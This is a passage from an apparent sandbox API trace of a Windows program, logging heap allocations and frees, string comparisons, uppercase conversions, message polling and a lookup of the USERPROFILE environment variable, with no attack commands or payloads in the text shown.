dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77a80 [0211.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Saved Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aved Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ved Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ed Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0211.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0211.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.234] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.234] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0211.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.234] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.235] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.236] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.237] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0211.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0211.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0211.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0211.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.239] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0211.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.239] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0211.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0211.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0211.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0211.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 